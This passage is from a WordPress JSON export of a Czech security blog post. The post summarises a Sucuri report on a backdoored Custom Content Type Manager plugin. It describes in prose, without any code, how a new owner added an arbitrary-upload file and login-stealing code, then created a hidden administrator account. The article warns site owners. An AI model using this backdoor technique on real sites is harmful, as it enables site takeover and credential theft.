\u010dl\u00e1nku<\/a>, plugin m\u00e1 ve statistik\u00e1ch na WordPress.org v\u00edce ne\u017e 10 tis\u00edc aktivn\u00edch instalac\u00ed. P\u0159esto, vypadal plugin opu\u0161t\u011bn\u011b, deset m\u011bs\u00edc\u016f nedo\u0161lo k \u017e\u00e1dn\u00e9 aktualizaci. P\u0159ed dv\u011bma t\u00fddny v\u0161ak do\u0161lo k aktualizaci, p\u0159i kter\u00e9 se zm\u011bnil autor pluginu a byl p\u0159id\u00e1n u\u017eivatel wooranker.<\/p>\nTen, p\u0159i t\u00e9to aktualizaci, p\u0159idal soubor auto-update.php, kter\u00fd umo\u017e\u0148uje, nahr\u00e1t jak\u00fdkoliv soubor, do slo\u017eky pro pluginy a ulo\u017eit s p\u0159\u00edponou php.<\/p>\n
To ale nen\u00ed v\u0161echno. Z\u00e1rove\u0148 byl vytvo\u0159en soubor CCTM_Comunicator.php a byla p\u0159id\u00e1na nov\u00e1 funkce do index.php pluginu.<\/p>\n
Funkce a soubor, p\u0159i ka\u017ed\u00e9m p\u0159ihl\u00e1\u0161en\u00ed, zaznamenaj\u00ed u\u017eivatelsk\u00e9 jm\u00e9no a heslo, kter\u00e9 odeslaj\u00ed na ur\u010ditou adresu.<\/p>\n
Wooranker tak po aktualizaci pluginu, z\u00edsk\u00e1 p\u0159ipraven\u00fd backdoor a z\u00e1rove\u0148 m\u016f\u017ee z\u00edskat va\u0161e p\u0159ihla\u0161ovac\u00ed \u00fadaje.<\/p>\n
Nem\u00e9n\u011b zaj\u00edmav\u00fd je v\u0161ak sc\u00e9n\u00e1\u0159, kter\u00fd je popisov\u00e1n d\u00e1le v \u010dl\u00e1nku.<\/p>\n
\u00dato\u010dn\u00edk, pomoc\u00ed vytvo\u0159en\u00e9ho backdooru nahr\u00e1l do slo\u017eky pro pluginy soubor c.php, kter\u00fd slou\u017e\u00ed k vytvo\u0159en\u00ed souboru wp-options.php v ko\u0159enov\u00e9 slo\u017ece WordPressu. Ten vyu\u017eije pot\u0159ebn\u00e9 soubory j\u00e1dra a vytvo\u0159\u00ed u\u017eivatele s administr\u00e1torsk\u00fdmi pr\u00e1vy. Mezit\u00edm je soubor c.php smaz\u00e1n.<\/p>\n
Nejv\u011bt\u0161\u00ed nebezpe\u010d\u00ed je, pokud pou\u017e\u00edv\u00e1te automatickou aktualizaci plugin\u016f. V tu chv\u00edli m\u00e1te probl\u00e9m, ani o tom netu\u0161\u00edte.<\/p>\n
Skv\u011bl\u00e1 je i posledn\u00ed \u010d\u00e1st zmi\u0148ovan\u00e9ho \u010dl\u00e1nku, kde pom\u011brn\u011b jednodu\u0161e odkr\u00fdvaj\u00ed toto\u017enost jist\u00e9ho v\u00fdvoj\u00e1\u0159e, kter\u00fd stoj\u00ed za \u00fatokem.<\/p>\n
Zdroj: https:\/\/blog.sucuri.net\/2016\/03\/when-wordpress-plugin-goes-bad.html<\/p>\n","protected":false},"excerpt":{"rendered":"
Ve v\u010derej\u0161\u00edm \u010dl\u00e1nku, uve\u0159ejnili bezpe\u010dnostn\u00ed specialist\u00e9 ze Sucuri, informaci o tom, \u017ee do popul\u00e1rn\u00edho pluginu Custom Content Type Manager, byl vlo\u017een backdoor, kter\u00fd umo\u017e\u0148uje ovl\u00e1dnout v\u00e1\u0161 web.<\/p>\n","protected":false},"author":1,"featured_media":2792,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"rank_math_lock_modified_date":false,"footnotes":""},"categories":[6],"tags":[79,81],"class_list":["post-2805","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bezpecnost-wordpressu","tag-backdoor","tag-bezpecnost"],"_links":{"self":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/posts\/2805"}],"collection":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/comments?post=2805"}],"version-history":[{"count":0,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/posts\/2805\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/media\/2792"}],"wp:attachment":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/media?parent=2805"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/categories?post=2805"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/tags?post=2805"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}